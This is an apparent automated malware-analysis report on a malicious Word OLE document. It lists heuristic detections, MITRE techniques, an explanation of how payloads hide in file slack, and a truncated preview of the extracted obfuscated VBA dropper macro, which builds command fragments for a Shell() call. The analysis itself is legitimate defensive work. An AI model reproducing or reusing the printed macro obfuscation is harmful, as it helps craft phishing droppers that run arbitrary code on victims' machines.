MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OLE document containing a VBA macro that utilizes the Shell() function, a critical heuristic indicating potential execution of arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure, likely involving image-based content to deceive the user. The macro's obfuscated nature and the presence of the Shell() call strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 252,416 bytes but its declared streams total only 24,693 bytes — 227,723 bytes (90%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70141 bytes |
SHA-256: 914dc1e156ed34ec3831ce430e41e9cf253ab8490a54e198707306ddfa5cedbe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zMtYzMkCzf"
Function kkwGpHvwJU()
On Error Resume Next
iWLSSdSVKM = ("7jvUUZBkSNFMb63rwV1TVw9w8Bi8ZOQJfWcU%=^heqF3V")
qcwFzjCBK = 6276616 + YCqTDJEtXBNcij - OPIb2 / Log(EWKjDrZapQNU / Int(HaDzABwJXCWn) - 8175992 * BXvzVvcsBBwcFz) / Qnf + Hex(ACqpUmwzQbd) / (XjTnsNsYDuQr - Int(GPZCAYvzhW) - 9954873 * ChrW(6293450 / WMEZiYsMFLhNEP + aYGlwQNX - CByte(4437031 + CLng(9173937 + ChrW(3201152) - 604119 - Chr(lqJUGurjUiPs)))))
VHcIiUnp = 9912807 + BDsowIjX - OPIb2 / Log(QNiiIphd / Int(VKaPBNGKY) - 6107191 * tqtwDLT) / Qnf + Hex(HUuwOjtGYLi) / (mACXommCihmjD - Int(PZUjizVCW) - 8685373 * ChrW(5058150 / LiHHiwqo + soVJRYRAZ - CByte(6642155 + CLng(2165406 + ChrW(8879258) - 9607158 - Chr(UlohlWkiI)))))
LkzIfmkV = Mid(iWLSSdSVKM, 29, 13)
XNAwGVJ = ("tiH&set %tH58MJzi")
EfGaw = 651040 + TGbnWXHziOrVz - OPIb2 / Log(BbVLJru / Int(jXIJbCDoVKHp) - 3394640 * ZZhuViNjX) / Qnf + Hex(XiTTzFpM) / (lXEfNwFtusjNKn - Int(BwdPWPUzABmw) - 6667770 * ChrW(6995739 / QVvrfrVtUzPlS + qtMrhSDbaqiRX - CByte(785389 + CLng(5659854 + ChrW(5201481) - 9914409 - Chr(JGcLSTHufC)))))
ERtrdAFPbD = 1856561 + GiBIJIZFB - OPIb2 / Log(lovFINTRQ / Int(wtcMNfatjmmAR) - 1705253 * DQPuUBtVqUoP) / Qnf + Hex(KuaOlQSMC) / (viifWOjkXmVFz - Int(XvrEYls) - 4935883 * ChrW(2973154 / jpLXOBpXB + TPmVXGKjQdr - CByte(944770 + CLng(9333314 + ChrW(4255422) - 8303143 - Chr(YOoQwVPUwhCIW)))))
NpAUwD = Mid(XNAwGVJ, 4, 7)
wzuIa = ("7uMjPiQXWuSEHidEr0N3OwX8zFo3bdwe^r^s&&setRaR6Jd")
HSYVImMv = 9701476 + NvwvjEUDTCF - OPIb2 / Log(wnAzSihvKji / Int(LiztQQBjRMl) - 5357458 * tnDKBAZwsB) / Qnf + Hex(ibWLqCVj) / (VkAFamDB - Int(NmBYZZqilI) - 6104938 * ChrW(1780766 / TjmKptqsPrE + CJnzjPzYa - CByte(5928148 + CLng(3011758 + ChrW(2098476) - 1834178 - Chr(zUMRMAC)))))
iwwItjAAYV = 8168371 + TTQzJLdzu - OPIb2 / Log(JXQDjBtikFoRbB / Int(wVjwiDMLsTiTR) - 7739738 * wjUNAfjRj) / Qnf + Hex(SSSlcCsOJ) / (pzzQtwLY - Int(BibtXIHwNBIP) - 833186 * ChrW(67497 / MkuaPQmEIbXz + EUDTIhijrYuc - CByte(4153773 + CLng(1218162 + ChrW(5822736) - 2633159 - Chr(wlzQDIB)))))
FbiRiHoRd = Mid(wzuIa, 31, 11)
uDCBDAGo = ("f2IMjhosD73mXCl&&set %Ma0RR53MMtzf3sozYfWEbwDTXQ")
IiivC = 9922016 + lmWVMYUEoGTH - OPIb2 / Log(jYDoTsXDtTud / Int(wlbvLAUfzEb) - 7296184 * oPHdsUZ) / Qnf + Hex(strWDLbjsS) / (riZidtvSnHj - Int(cCODHvQbZE) - 1555484 * ChrW(1216587 / jZIpswHlzuWPj + jwBmOLZPToI - CByte(3819538 + CLng(7207738 + ChrW(5291135) - 8227740 - Chr(naSrtTn)))))
UBFiojKObmv = 5683114 + IZidIsnaRjfXSt - OPIb2 / Log(SUFTjYNfuwHvwp / Int(QJYrGmqmLvUs) - 3934612 * LfVjYYYOTwWvto) / Qnf + Hex(BzqljQVzbnI) / (iuYMfsljRlO - Int(RLBqbUKsCF) - 1982192 * ChrW(9666386 / HniqfutPwqT + krCIFOPiSTUOfX - CByte(1281657 + CLng(5544427 + ChrW(3102751) - 5058057 - Chr(kaiXEGslrVJ)))))
HWkPpzLwAIl = Mid(uDCBDAGo, 13, 10)
hWWPzwHznNC = ("pJB3w 8v7raMMIKFF8izsMFl&&set %nSDU")
nBdlzEVodNm = 5679940 + RmqkVAB - OPIb2 / Log(CLovBXzYzIr / Int(dufsNZlL) - 2390731 * PEnGpNDXV) / Qnf + Hex(jaNzlCWj) / (ftvwVXXGz - Int(vPpRovkHuh) - 7272331 * ChrW(4063864 / nlbDjjHKDBw + UUFSjSHGAZrq - CByte(1766007 + CLng(4815145 + ChrW(612348) - 240542 - Chr(bCbKRINtUqaqMs)))))
GwkVPaF = 2647646 + kTbioLOiPbNtl - OPIb2 / Log(HdFPbwWVCLsZPc / Int(PnhdzYFbWGQo) - 9416433 * qvTIZiwkwQPUOQ) / Qnf + Hex(mOwlzzofQ) / (VCBjJLKZaMQZ - Int(pukiqROiJ) - 7899491 * ChrW(2230022 / rTCzwBPCWEfu + nEEuoDz - CByte(2535133 + CLng(9488965 + ChrW(1288483) - 8270443 - Chr(UzNBGLNqz)))))
tiYYtltftwI = Mid(hWWPzwHznNC, 24, 10)
OsNGuPFu = ("oIkDBwVb0tKQmA7FZ6ZaZdIFHis0niFjnib%=p&cwIkhD")
MThCkI = 1261976 + KWPCcUuBd - OPIb2 / Log(UHJbVuqGopBJ / Int(kbaMijVXdcCm) - 1557268 * JwzCwiCXwB) / Qnf + Hex(KYUcORMAnfa) / (HMUINrf - Int(oNXjKpnF) - 5307470 * ChrW(6216431 / fZlXIBuOL + mUriurpbZofRu - CByte(7392278 + CLng(9436701 + ChrW(34029) - 7524839 - Chr(ZiGYHSvcW)))))
NHpmfs = 7808625
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.